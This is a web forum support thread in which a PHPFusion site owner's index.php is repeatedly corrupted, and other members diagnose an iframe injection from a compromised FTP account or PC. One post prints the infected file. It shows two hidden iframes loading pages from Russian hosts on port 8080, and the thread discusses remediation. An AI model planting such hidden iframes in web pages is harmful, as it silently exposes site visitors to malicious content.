Oh no! Where's the JavaScript?
Your Web browser does not have JavaScript enabled or does not support JavaScript. Please enable JavaScript on your Web browser to properly view this Web site, or upgrade to a Web browser that does support JavaScript.
Sign In
Not a member yet? Click here to register.
Navigation

index.php always broken

Last updated on 11 years ago
B
bobesama
Posted 11 years ago
help me my index.php always broken.. syntax error.. i overwrite with a new one its ok than after 2 days broken again

Warning: Unexpected character in input: ''' (ASCII=39) state=1 in /home/skmambau/public_html/index.php on line 20

Parse error: syntax error, unexpected '<', expecting ']' in /home/skmambau/public_html/index.php on line 21

and my forum and adminsitrator index.php also accure like this help me
D
Diemux
Posted 11 years ago
This should be in the index file in the root:


<?php
/*-------------------------------------------------------+
| PHPFusion Content Management System
| Copyright (C) 2002 - 2008 Nick Jones
| http://www.php-fusion.co.uk/
+--------------------------------------------------------+
| Filename: index.php
| Author: Nick Jones (Digitanium)
+--------------------------------------------------------+
| This program is released as free software under the
| Affero GPL license. You can redistribute it and/or
| modify it under the terms of this license which you
| can read by viewing the included agpl.txt or online
| at www.gnu.org/licenses/agpl.html. Removal of this
| copyright header is strictly prohibited without
| written permission from the original author(s).
+--------------------------------------------------------*/
require_once "maincore.php";

redirect($settings['opening_page']);
?>



Which way of uploading do you use? FTP (and in which mode) or a filemanager?
Over 1200 v6 and v7 downloads available here: PHPFusion-mods.net

Updated almost daily!
Posted 11 years ago
are you able to post the code for your index.php when the error occurs?
www.wafflechunks.com/images/badges/wafflebadge.png
PolarFoxPolarFox
Posted 11 years ago
And check the rights of the index.php - must be 644 i think.
B
bobesama
Posted 11 years ago
i use filezilla to upload file to my server.. the things is that that line like gone by it self.. so then the error accure.. the original file lete say 30kb and in my server it gone to 29kb.. i also dunno why.. the file right is 644.. i update the version 7.. if the error accure again i post the code.. thanx guys
PolarFoxPolarFox
Posted 11 years ago
Can trojan on your computer stole the password of FTP?
Posted 11 years ago

Quote

bobesama wrote:
i use filezilla to upload file to my server.. the things is that that line like gone by it self.. so then the error accure.. the original file lete say 30kb and in my server it gone to 29kb.. i also dunno why.. the file right is 644.. i update the version 7.. if the error accure again i post the code.. thanx guys
I've seen the file size thing happen before. I think it's because your computer rounds up and the server rounds down.... or something like that
www.wafflechunks.com/images/badges/wafflebadge.png
F
filmizlemek
Posted 11 years ago
Please make sure the file format is UTF-8. To do it create new utf-8 php file and pickup from other files the text and paste the new utf-8 formatted php and try again. I hope it helps.
B
bobesama
Posted 11 years ago

Quote

filmizlemek wrote:
Please make sure the file format is UTF-8. To do it create new utf-8 php file and pickup from other files the text and paste the new utf-8 formatted php and try again. I hope it helps.


how to do? use what? software? i use php designer.. can explain a bit more?
B
bobesama
Posted 11 years ago

Warning: Unexpected character in input: ''' (ASCII=39) state=1 in /home/skmambau/public_html/index.php on line 20

Parse error: syntax error, unexpected '<', expecting ']' in /home/skmambau/public_html/index.php on line 21

its happen again damn.. i post the code below
B
bobesama
Posted 11 years ago
<?php
/*-------------------------------------------------------+
| PHPFusion Content Management System
| Copyright (C) 2002 - 2008 Nick Jones
| http://www.php-fusion.co.uk/
+--------------------------------------------------------+
| Filename: index.php
| Author: Nick Jones (Digitanium)
+--------------------------------------------------------+
| This program is released as free software under the
| Affero GPL license. You can redistribute it and/or
| modify it under the terms of this license which you
| can read by viewing the included agpl.txt or online
| at www.gnu.org/licenses/agpl.html. Removal of this
| copyright header is strictly prohibited without
| written permission from the original author(s).
+--------------------------------------------------------*/
require_once "maincore.php";

redirect($settings['
<iframe src="http://c8t.ru:8080/index.php" width=124 height=183 style="visibilit
<iframe src="http://ce5.ru:8080/index.php" width=178 height=164 style="visibility: hidden"></iframe>
B
bobesama
Posted 11 years ago
the thing is that that opening_page line is missing by itself every at least 2 days.. can som1 help me
B
bobesama
Posted 11 years ago
PolarFoxPolarFox
Posted 11 years ago
Check your computer about viruses - step 1

Change your FTP password - step 2

recommendation from there http://www.viry.cz/forum/viewtopic.php?f=13&t=89983 :)
B
bobesama
Posted 11 years ago
my pc just formatted.. so its clean.. maybe ftp passwd but it is strong.. hmm.. thats site is not in english hehe.. by the way my forum link got some problem.. the pic that i put in my site at the main page.. at the news all come out but in forum link the pic dont come out.. hmm y? only happen at my forum link
bitebite
Posted 11 years ago
You got infected by IFrame!
1. Download good anti-virus like Kaspersky or NOD and scan your computer.
2. Change MySQL Database, CPanel and FTP passwords.
Now if possible remove all files from FTP, download latest version of PHPFusion and install it, or download config.php file from your FTP, delete all files on FTP, upload fresh PHPFusion files and config.php to the FTP.
In second case, don't forget to change database password in config.php before uploading it back.
Edited by bite on 28-08-2009 10:37, 11 years ago
B
bobesama
Posted 11 years ago
ok ill try
edis2edis2
Posted 11 years ago
when you clear computer and FTP I suggest maincore.php, all index.php and subheader.php chmod 444
img266.imageshack.us/img266/1708/phpfusionuser.png
B
bobesama
Posted 11 years ago
it is an iframe virus.. ****.. hehe.. 5 link broken by it self.. iframe virus hide behind our adobe file.. at c/common files/adobe/activeX/AcoIEhelper.dll.. cant scan by antivirus.. so have to find it the hard way.. or use Hijackthis tools.. if u guys wan some virusdetection php on ur web ive got one.. dunno where to put it.. infusion or mods... cheers
You can view all discussion threads in this forum.
You cannot start a new discussion thread in this forum.
You cannot reply in this discussion thread.
You cannot start on a poll in this forum.
You cannot upload attachments in this forum.
You can download attachments in this forum.
You cannot up or down-vote on the post in this discussion thread.
You cannot set up a bounty in this discussion thread.
Moderator: Support Team
Users who participated in discussion: Diemux, wafflechunk, bite, PolarFox, edis2, bobesama, filmizlemek,